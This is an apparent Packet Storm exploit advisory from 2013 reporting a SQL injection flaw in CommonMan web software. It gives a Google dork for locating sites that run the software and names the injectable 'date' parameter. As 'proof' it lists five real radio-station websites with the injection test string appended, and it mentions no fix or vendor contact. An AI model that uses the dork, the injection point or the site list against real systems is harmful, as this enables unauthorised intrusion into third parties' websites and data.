CommonMan SQL Injection

2013-09-07T00:00:00
ID PACKETSTORM:123135
Type packetstorm
Reporter Ashiyane Digital Security Team
Modified 2013-09-07T00:00:00

Description

                                        
                                            `#********************************************************************************  
# Exploit Title : CommonMan Sql injection Vulnerabilites  
#  
# Software link : http://www.cmiti.com  
#  
# Exploit Author : Ashiyane Digital Security Team  
#  
# Tested on: Windows 7 , Linux  
#  
# Google Dork : intext:"Site Powered by CommonMan Technologies"  
#  
# Date: 2013/09/07  
#  
--------------------------------------------------------------------  
# Exploit : Sql Injection  
#  
# Location : [Target]/schedules/default.asp?date=[Sql Injection]  
#  
#  
# Proof:  
#  
# http://www.am1220wlpo.com/schedules/default.asp?date=1'  
  
#  
  
  
# http://www.20inarowcountry.com/schedules/default.asp?date=1'  
#  
# http://www.965thewolf.com/schedules/default.asp?date=1'  
#  
# http://www.wkot.com/schedules/default.asp?date=1'  
#  
# http://wlpoamandfm.com/schedules/default.asp?date=1'  
#  
######################  
discovered by : ACC3SS  
######################  
`